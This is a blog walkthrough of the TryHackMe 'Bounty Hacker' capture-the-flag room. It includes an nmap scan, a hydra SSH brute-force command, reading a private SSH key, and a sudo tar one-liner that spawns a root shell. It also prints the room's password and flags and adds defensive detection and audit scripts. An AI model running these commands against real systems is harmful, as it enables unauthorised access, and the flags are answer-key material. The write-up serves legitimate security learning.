TryHackMe CTF : Bounty Hacker – Walkthrough

November 24, 2024
Posted in CTF, TryHackMe
By Jasper

Hi! This is my walkthrough on the Bounty Hacker CTF on TryHackMe. I am making these walkthroughs to keep myself motivated to learn cyber security, and to ensure that I remember the knowledge gained from THM's rooms. Join me in learning cyber security. I will try to explain concepts as I go, to differentiate myself from other walkthroughs.

Room URL: https://tryhackme.com/room/cowboyhacker


Task 1 (Living up to the title)

You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they’d take you up on claims! Prove your status is more than just a few glasses at the bar. I sense bell peppers & beef in your future! Let’s prove that we are a true Bounty Hacker!

Questions

Deploy the machine.

Answer: No answer needed.

Find open ports on the machine

I found that scanning all ports took way too long on my AttackBox, so I simply selected the top 100 ports:

nmap --top-ports 100 10.10.5.226

I found 3 open ports: 21 (ftp), 22 (ssh) and port 80 (http).

Let’s do a more detailed port scan of those 3 ports:

nmap -A -p 21,22,80 10.10.5.226
Port scanning with nmap

We found a webpage:

Webserver running on port 80

But more importantly for this task, anonymous access is available on the FTP service. We can also see that there is a task.txt file on it.

Answer: No answer needed

Who wrote the task list?

Great job so far, Bounty Hacker. Let’s try logging in on the ftp service:

ftp <ip address>
Getting access to the ftp server

We can see that lin has written the note.

Answer: lin

What service can you bruteforce with the text file found?

There is another text file on the ftp server: locks.txt. It has the following content:

Wordlist for cracking SSH

This looks like some kind of wordlist that we can use to gain access to a server. Since the server has password-protected SSH access, I am going to guess we can bruteforce it.

Answer: ssh

What is the users password?

To bruteforce lin’s password we can use hydra. We know the username and in addition have a wordlist to use. Download the locks.txt file to your machine:

mget *.txt

Run the following hydra command:

hydra -l lin -P locks.txt -t 6 ssh://<machine ip>

This quickly cracked the password:

Results of running hydra

Answer: RedDr4gonSynd1cat3
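
From the defender's side, the hydra run above leaves a clear trace in the SSH server's auth log: a burst of failed password attempts for lin from one address, followed by a success. The detector below is an added example, not part of the original walkthrough; the log lines, hostname, PIDs, ports and source addresses are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# sshd password-auth lines as written to /var/log/auth.log on Ubuntu.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60), year=2024):
    """Alert on sources with >= threshold failed logins inside `window`.

    `compromised` is set when the same source then logs in successfully while
    failures are still in the window: a guessing run that found the password.
    syslog timestamps carry no year, so the caller supplies one.
    """
    recent = defaultdict(deque)  # ip -> (timestamp, user) of recent failures
    alerts = {}                  # ip -> {"users": set, "compromised": str|None}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        q = recent[m["ip"]]
        while q and ts - q[0][0] > window:
            q.popleft()
        if m["result"] == "Failed":
            q.append((ts, m["user"]))
            if len(q) >= threshold:
                alert = alerts.setdefault(m["ip"], {"users": set(), "compromised": None})
                alert["users"].update(user for _, user in q)
        elif q and m["ip"] in alerts:
            alerts[m["ip"]]["compromised"] = m["user"]
    return alerts

def sample_log():
    """Constructed log: hostname, PIDs, ports and addresses are made up."""
    fmt = "Nov 24 10:15:{:02d} bountyhacker sshd[{}]: {} password for lin from {} port {} ssh2"
    lines = [fmt.format(s, 1200 + s, "Failed", "10.10.14.7", 40100 + s) for s in range(8)]
    lines.append(fmt.format(9, 1209, "Accepted", "10.10.14.7", 40109))
    # One mistyped password followed by a normal login must not alert.
    lines.append(fmt.format(30, 1300, "Failed", "10.10.20.5", 51000))
    lines.append(fmt.format(40, 1301, "Accepted", "10.10.20.5", 51001))
    return lines

if __name__ == "__main__":
    for ip, alert in detect_bruteforce(sample_log()).items():
        print(ip, sorted(alert["users"]), "compromised:", alert["compromised"])
```
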

user.txt

Now we know the password and username, we can log on to the SSH service.

ssh lin@10.10.5.226

And type in the password.

This is going very smoothly. We have access and can see the user.txt file:

Logging in to SSH

Answer: THM{CR1M3_SyNd1C4T3}

root.txt

Now, all we need is root access to read the file called root.txt. We need more info to figure out what to do next. It’s time for some enumeration.

Enumeration

Let’s look at different attack vectors.

User’s Home Directory Contents

Listing files in the home directory

Let’s look at the .ssh folder in a bit.

Home Directory Contents

If we look for other users’ home directories, we don’t find any:

Listing directories in home directory

There are no other user directories.

List current processes

ps aux
Looking at running processes

Interesting username. Whoopsie…

But this is completely innocent:

In Ubuntu, whoopsie is a daemon that is responsible for collecting error reports from apport and then sending that report to Canonical if the user agrees to this in the apport confirmation dialog.

SSH Directory Contents

List the ssh content by entering:

ls -l ~/.ssh
Checking out the .ssh folder

Interesting!

cat ~/.ssh/id_rsa

But we already have ssh access! Just wanted to show you anyways 🙂

Bash History

We can look at previously run terminal commands. Run history.

history

Nothing to see here.

Cron Jobs

ls -la /etc/cron.daily/
Checking out daily cron jobs

passwd looks interesting.

passwd cron process

But after some googling I found out this is a completely innocent normal process.

Sudo — List User’s Privileges

sudo -l
Listing user privileges

Now, this is interesting! We can run the /bin/tar command as root through sudo. This is something we can exploit! I found the following info on this page:

https://gtfobins.github.io/gtfobins/tar/

Sudo tar exploit

Run this command:

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Running the exploit and gaining root access

We got root access. Find the file in the root directory and read it:

Reading the flag

Answer: THM{80UN7Y_h4cK3r}
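
The sudo rule is the root cause here: /bin/tar is granted with no argument list, so sudo accepts any tar option. The audit below is an added example, not part of the original walkthrough; it checks `sudo -l` output for such rules, and the sample outputs, the hostname and the tightened backup rule are constructed.

```python
import os
import re

# Binaries that can start other programs, so an unrestricted sudo rule for
# them equals a root shell. Illustrative subset; tar is the one on this page.
EXEC_CAPABLE = {"tar", "find", "vim", "less", "awk"}

# A rule line from `sudo -l`: "(runas) [TAG: ...] command[, command]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?:[A-Z]+:\s*)*(?P<cmds>.+)$")

def audit_sudo_l(output):
    """Return findings for risky rules in the text printed by `sudo -l`."""
    findings = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m["cmds"].split(", "):
            path, *args = cmd.split()
            if path == "ALL":
                reason = "every command allowed"
            elif os.path.basename(path) not in EXEC_CAPABLE:
                continue
            elif not args:
                reason = "no argument list, so any option may be passed"
            elif any("*" in a for a in args):
                reason = "wildcard in argument list"
            else:
                continue  # exact argument list: sudo rejects extra options
            findings.append({"runas": m["runas"], "command": path, "reason": reason})
    return findings

# Constructed `sudo -l` output modelled on the finding above (hostname made up).
WEAK = """\
User lin may run the following commands on bountyhacker:
    (root) /bin/tar
"""
# Hypothetical tightened rule: one fixed backup job with an exact argument list.
FIXED = """\
User lin may run the following commands on bountyhacker:
    (root) /bin/tar -czf /var/backups/site.tgz /var/www
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK), ("fixed", FIXED)):
        print(name, audit_sudo_l(text))
```
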

We are done! I hope it made sense. Bounty Hacker definitely was an easier CTF, but I have to admit that the last step was kinda tricky to figure out. I hope you learned that proper enumeration is very important! Thanks for reading, and give me a clap if you like 🙂

